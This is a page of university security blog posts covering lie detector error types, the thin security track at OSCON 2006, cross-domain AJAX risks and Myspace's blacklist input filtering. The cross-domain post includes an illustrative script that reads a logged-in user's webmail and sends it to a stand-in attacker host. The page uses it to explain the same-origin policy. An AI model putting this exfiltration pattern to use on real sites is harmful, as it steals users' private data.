The Center for Education and Research in Information Assurance and Security (CERIAS)

CERIAS Blog

A few comments on errors


I wrote a post for Dave Farber’s IP list on the use of lie detectors by the government.  My basic point was that some uses of imperfect technology are OK, if we understand the kinds of risks and errors we are encountering.  I continue to see people who don’t understand the difference between Type I and Type II errors, and who make faulty judgments as a result.

What follows is a (slightly edited) version of that post:


The following is a general discussion.  I am in no sense an expert on lie detectors, but this is how it was explained to me by some who are very familiar with the issue.

Lie detectors have a non-zero rate of error.  As with many real-world systems, these errors manifest as Type I errors (alpha error, false positive), Type II errors (beta error, false negative), and instances of “can’t tell.”  It’s important to understand the distinction because the errors and ambiguities in any system may not be equally likely, and the consequences may be very different.  An example I give my students comes after we go over a proof that writing a computer virus checker that accurately detects all computer viruses is equivalent to solving the halting problem.  I then tell them that I can provide them with code that identifies every program infected with a computer virus in constant running time.  They think this contradicts the proof.  I then write on the board the equivalent of “Begin; print “Infected!”; End.”, which identifies every program as infected.  There are no Type II errors.  However, there are many Type I errors, and thus this is not a useful program.  But I digress (slightly)...
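To make the trade-off concrete, here is a minimal sketch (TypeScript; the corpus and names are made up purely for illustration) of that classroom “detector”: it can never produce a Type II error, but every clean program it sees becomes a Type I error.

    // A "detector" that labels every program as infected.
    // It has zero Type II errors (no infected program is ever reported clean),
    // but it flags every clean program, so its Type I error count is maximal.
    type Program = { name: string; actuallyInfected: boolean };

    function alwaysInfected(_p: Program): boolean {
      return true; // "Infected!" in constant time, regardless of input
    }

    // Hypothetical corpus, just to tally the two error types.
    const corpus: Program[] = [
      { name: "editor.exe", actuallyInfected: false },
      { name: "game.exe",   actuallyInfected: false },
      { name: "trojan.exe", actuallyInfected: true },
    ];

    let typeI = 0;  // false positives: clean programs flagged as infected
    let typeII = 0; // false negatives: infected programs reported clean
    for (const p of corpus) {
      const flagged = alwaysInfected(p);
      if (flagged && !p.actuallyInfected) typeI++;
      if (!flagged && p.actuallyInfected) typeII++;
    }
    console.log({ typeI, typeII }); // { typeI: 2, typeII: 0 }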

I have been told that lie detectors more frequently exhibit Type I errors because subjects may be nervous or have a medical condition, and that Type II errors generally result from training or drug use (or both) by the subject, although some psychological disorders allow psychopaths to lie undetectably.  Asking foil questions (asking the subject to lie, and asking a surprise question to get a reaction) helps to identify individuals with potential for Type II errors.  Proper administration (e.g., reviewing the questions with the subject prior to the exam, and revising them as necessary to prevent ambiguity) helps to minimize Type I errors.  [Example.  When granting a security clearance, you want to weed out people who might be more likely to commit major crimes, or who have committed them already and not yet been discovered (they may be more prone to blackmail, or future offenses).  Thus, you might ask “Have you committed any crimes you haven’t disclosed on your application?”  Someone very literal-minded might think back to speeding down the Interstate this morning, lying to buy beer at age 20, and so on, and thus trigger a reaction.  Instead, the examiner should explain before the exam that the question is meant to expose felonies, and not traffic violations and misdemeanors.]  “Can’t tell” situations are resolved by giving the exam again at a later time, or by reporting the results as ambiguous.

In a criminal investigation, any error can be a problem if the results are used as evidence.***  For instance, if I ask “Did you commit the robbery?” and there is a Type I error, I would erroneously conclude you were guilty.  Our legal system does not allow this kind of measurement as evidence, although the police may use a negative result to clear you of suspicion.  (This is not always a sound step, because some psychopaths are able to lie so as to generate Type II errors.)  If I asked “Are you going to hijack this plane?” then you might be afraid of the consequences of a false reading, or have a fear of flying, and there would be a high Type I error rate.  Thus, this probably won’t be a good mechanism to screen passengers, either.  (However, current TSA practice in other areas is to accept lots of Type I errors in hopes of pushing Type II errors to zero.  An example is not letting *any* liquids or gels on planes, even if harmless, so as to keep any liquid explosives from getting on board.)
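A quick back-of-the-envelope calculation shows why a high Type I rate is fatal for passenger screening.  The numbers below (TypeScript) are invented purely for illustration: even if a test never misses a real hijacker, a tiny base rate means nearly every alarm is a false one.

    // Hypothetical numbers, chosen only to illustrate the base-rate problem.
    const passengers = 1_000_000;
    const hijackerRate = 1 / 1_000_000; // assume one actual hijacker per million passengers
    const typeIRate = 0.05;             // 5% of innocent passengers "fail" the test
    const typeIIRate = 0.0;             // assume the test never misses a real hijacker

    const hijackers = passengers * hijackerRate;    // 1
    const innocents = passengers - hijackers;       // 999,999
    const falseAlarms = innocents * typeIRate;      // ~50,000
    const detected = hijackers * (1 - typeIIRate);  // 1

    // Roughly 50,000 false alarms for every true detection.
    console.log(falseAlarms / detected);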

When the US government uses lie detectors in security clearances, they aren’t seeking to identify EXACTLY which individuals are likely to be a problem.  Instead, they are trying to reduce the likelihood that people with clearances will pose a risk, and it is judged acceptable to have some Type I errors in the process of minimizing Type II errors.  So, as with many aspects of the adjudication process, they simply fail to grant a clearance to people who score too high on some aspect of the evaluation, including the lie detector test.  They may also deny clearances to people who have had too many close contacts with foreign nationals, or who have a bad history of going into debt, or any of several other factors based on prior experience and analysis.  Does that mean that those people are traitors?  No, and the system is set up not to draw that specific conclusion.  If you fail a lie detector test for a clearance, you aren’t arrested for treason! *  The same is true if your background investigation score rates too high on lifestyle issues.  What it DOES mean is that there are heightened indications of risk, and unless you are “special” for a particular reason,**  the government chooses not to issue a clearance so as to reduce the risk.  Undoubtedly, there are some highly qualified, talented individuals who are therefore not given clearances.  However, they aren’t charged with anything or deprived of fundamental rights or liberties.  Instead, they are simply not extended a special classification.  The end result is that people who pass through the process to the end are less likely to be security risks than an equal sample drawn from the general population.

The same screening logic is used in other places.  For instance, consider blood donation.  One of the screening questions that will keep a donation from being used in transfusions asks whether a male donor has had sex with another male since (I think) 1980.  Does that mean that everyone in that category has hepatitis or HIV?  No!  It only means that those individuals, as a class, are at higher risk, and they are a small enough subset that it is worth excluding them from the donor pool to make the donations safer in aggregate.  Other examples include insurance premiums (whether to grant insurance to high-risk individuals), and even personal decisions (“I won’t date women with multiple facial piercings and more than 2 cats—too crazy.”)  These are general exclusions that almost certainly include some Type I errors, but the end result is (in aggregate) less risk.

Back to lie detectors.  There are two cases other than initial screening that are of some concern.  The first is periodic rechecks (standard procedure); the second is instituting new screening on existing employees, as was done at some of the national labs a few years ago.  In the case of periodic rechecks, the assumption is that the subject passed the exam before, and a positive reading now is either an indication that something has happened, or is a false positive.  Examiners often err on the side of treating it as a false positive in this case rather than triggering a more in-depth exam;  Aldrich Ames was one such case (unfortunately), and he wasn’t identified until more damage was done.  If someone with a clearance goes back for a re-exam and “flunks” it, that person is often given multiple opportunities to retake it.  A continued inability to pass the exam should trigger a more in-depth investigation, and may result in a reassignment or a reduction in access until a further determination is made.  In some cases (which I have been told are rare) someone’s clearance may be downgraded or revoked.  However, even in those cases, no statement of guilt is made; it is simply the case that a privilege is revoked.  That may be traumatic to the individual subject, certainly, but so long as it is rare it is sound risk management in aggregate for the government.

The second case, that of screening people for the first time after they have had access already and are “trusted” in place, is similar in nature except it may be viewed as unduly stressful or insulting by the subjects—as was the case when national lab employees were required to pass a polygraph for the first time, even though some had had DoE clearances for decades.  I have no idea how this set of exams went.

Notes to the above

*—Although people flunking the test may not be charged with treason, they may be charged with falsifying data on the security questionnaire!  I was told of one case where someone applying for a cleared position had a history of drug use that he thought would disqualify him, so he entered false information on his clearance application.  When he learned of the lie detector test, he panicked and convinced his brother to go take the test for him.  The first question was “Are you Mr. X?” and the stand-in blew the pens off the charts.  Both individuals were charged and pled guilty to something; neither will ever get a security clearance! grin

**—Difficult and special cases arise when someone, by reason of office or designation, is required to be cleared.  Suppose, for instance, you are nominated to be the next Secretary of Defense, but you can’t pass the polygraph given as part of the standard clearance process.  This goes through a special investigation and adjudication process that was not explained to me, so I don’t know how it is handled.

***—In most Western world legal systems.  In some countries, fail the polygraph and get a bullet to the head.  The population is interchangeable, so no need to get hung up on quibbles over individual rights and error rates.  Sociopaths who can lie and get away with it (Type II errors) tend to rise to the top of the political structures in these countries, so think of it as evolution in action….


So, bottom line:  yes, lie detector tests generate errors, but the process can be managed to reduce the errors and serve as a risk reduction tool when used in concert with other processes.  That’s how it is used by the government.

OSCON 2006: Where’s the Security?


OSCON 2006 was a lot of fun for a lot of reasons, and was overall a very positive experience.  There were a few things that bugged me, though.

I met a lot of cool people at OSCON.  There are too many folks to list here without either getting really boring or forgetting someone, but I was happy to put a lot of faces to names and exchange ideas with some Very Smart People.  The PHP Security Hoedown BOF that I moderated was especially good in that respect, I thought.  There were also a lot of good sessions, especially Theo Schlossnagle’s Big Bad PostgreSQL: A Case Study, Chris Shiflett’s PHP Security Testing, and the PHP Lightning Talks (“PHP-Nuke is a honeypot” - thank you for the best quote of the convention, Zak Greant).

On the other hand, I was very surprised that the Security track at OSCON was almost nonexistent.  There were four sessions and one tutorial, and for a 5-day event with lots of sessions going on at the same time, that seems like a really poor showing.  The only other tracks that had security-related sessions were:

  • Linux (including one shared with the Security track)
  • PHP

which leaves us with the following tracks with no security-oriented sessions:

  • Business
  • Databases
  • Desktop Apps
  • Emerging Topics
  • Java
  • JavaScript/Ajax
  • Perl
  • Products and Services
  • Programming
  • Python
  • Ruby
  • Web Apps
  • Windows

I can certainly think of a few pertinent security topics for each of these tracks.  I’m not affiliated with O’Reilly, and I have no idea whether the OSCON planners just didn’t get very many security-related proposals, or whether they felt that attendees wouldn’t be interested in them.  Either way, it’s worrisome.

Security is an essential part of any kind of development: as fundamental as interface design or performance.  Developers are stewards of the data of their users, and if we don’t take that responsibility seriously, all our sweet gradient backgrounds and performance optimizations are pointless.  So to see, for one reason or another, security relegated to steerage at OSCON was disappointing.  I hope O’Reilly works hard to correct this next year, and I’m going to encourage other CERIAS folk like Pascal Meunier and Keith Watson to send in proposals for 2007.

Shiflett on the danger of cross-domain AJAX scripting


Chris Shiflett has posted a good piece on his blog about the potential danger of cross-domain AJAX scripting.  When Chris and I discussed this at OSCON, I was pretty surprised that anyone would think that violating the same-origin restrictions was in any way a good idea.  His post gives a good example of how dangerous this would be.
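For readers unfamiliar with the same-origin restriction, the sketch below (TypeScript; the hostnames are hypothetical) shows the kind of attack it exists to prevent.  If a script on any page could make AJAX requests to any domain and read the responses, the browser would attach your session cookies to those requests, so any site you visit could quietly read data from sites you are logged into.

    // Hypothetical illustration of what the same-origin policy prevents.
    // Imagine this script running on evil.example.com, a page you happened to visit.
    const xhr = new XMLHttpRequest();
    xhr.open("GET", "https://webmail.example.com/inbox"); // a site you are logged into
    xhr.onload = () => {
      // The same-origin policy normally blocks this read, because the two
      // origins differ.  If cross-domain AJAX were allowed unconditionally,
      // the attacker could read your private data and ship it home:
      const stolen = xhr.responseText;
      new Image().src =
        "https://evil.example.com/collect?d=" + encodeURIComponent(stolen);
    };
    xhr.send();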

CERIAS at Portland OSCON 2006


Just a reminder: next week I’ll be in Portland at OSCON 2006.  I’ll be moderating the PHP Security Hoedown Wednesday night.  If you’re interested in meeting up and talking about web app security stuff or CERIAS, please drop us a line at oscon@cerias.purdue.edu.

The biggest mistake of Myspace


Myspace, the super-popular web site that your kid uses and you don’t, was once again hit by a worm, this time utilizing Macromedia Flash as its primary vector.  This was a reminder for me of just how badly Myspace has screwed up when it comes to input filtering:

  • They use a “blacklist” approach, disallowing customized markup that they know could be an issue.  How confident are you that they covered all their bases and could anticipate future problems?  I don’t trust my own code that much, let alone theirs.  (A sketch of the alternative, a “whitelist” approach, appears after this list.)
  • They allow embed HTML tags.  That means letting folks embed arbitrary content that utilizes plugins, like… Flash.  While Myspace filters JavaScript, they seem to have forgotten that Flash can interact with JavaScript and manipulate the DOM.  If you’re a Myspace user, you may have noticed JavaScript alert()-style pop-up windows appearing on some profiles; those are generated by embedding an offsite Flash program into a profile, which then generates JavaScript code.
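
A whitelist inverts the burden of proof: instead of enumerating markup you know is dangerous, you enumerate the handful of tags you are willing to allow and drop everything else, attributes included.  The toy sketch below (TypeScript; the tag list and regex are mine and purely illustrative, since a real filter should use a proper HTML parser rather than regular expressions) shows the difference in mindset.

    // Toy whitelist filter: keep only a short list of presentational tags,
    // stripped of all attributes, and drop every other tag outright
    // (script, embed, object, and anything not yet invented).
    const ALLOWED_TAGS = new Set(["b", "i", "em", "strong", "p", "br"]);

    function whitelistFilter(html: string): string {
      return html.replace(/<\/?([a-zA-Z0-9]+)[^>]*>/g, (tag, name: string) =>
        ALLOWED_TAGS.has(name.toLowerCase())
          ? `<${tag.startsWith("</") ? "/" : ""}${name.toLowerCase()}>` // rebuild without attributes
          : ""                                                          // unknown tag: drop it
      );
    }

    console.log(whitelistFilter('<b onclick="evil()">hi</b> <embed src="bad.swf">'));
    // prints "<b>hi</b> " -- the embed tag is gone

A blacklist has to anticipate every dangerous construct, present and future; a whitelist only has to get a short list of safe ones right.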

Even if they can plug these holes, it’s unlikely that anything short of a full rewrite or refactoring of their profile customization system can ever be considered even moderately secure.

So will Myspace get their act together and modify their input filtering approaches? Very unlikely.  A large portion of Myspace’s appeal relies upon the customization techniques that allow users to decorate their pages with all manner of obnoxious flashing, glittery animations and videos.  Millions of users rely on cobbled-together hacks to twist their profiles into something fancier than the default, and a substantial cottage industry has sprung up around the subject.  Doing proper input filtering means undoing much of that.

Even if relatively secure equivalent techniques are offered, Myspace would certainly find themselves with a disgruntled user base that’s more likely to bail to a competitor.  That’s an incredibly risky move in the social networking market, and will likely lead Myspace to continue plugging holes rather than building a dam that works.

This is why you can’t design web applications with security as an afterthought.  Myspace has done exactly that, and I think it will prove to be their biggest mistake.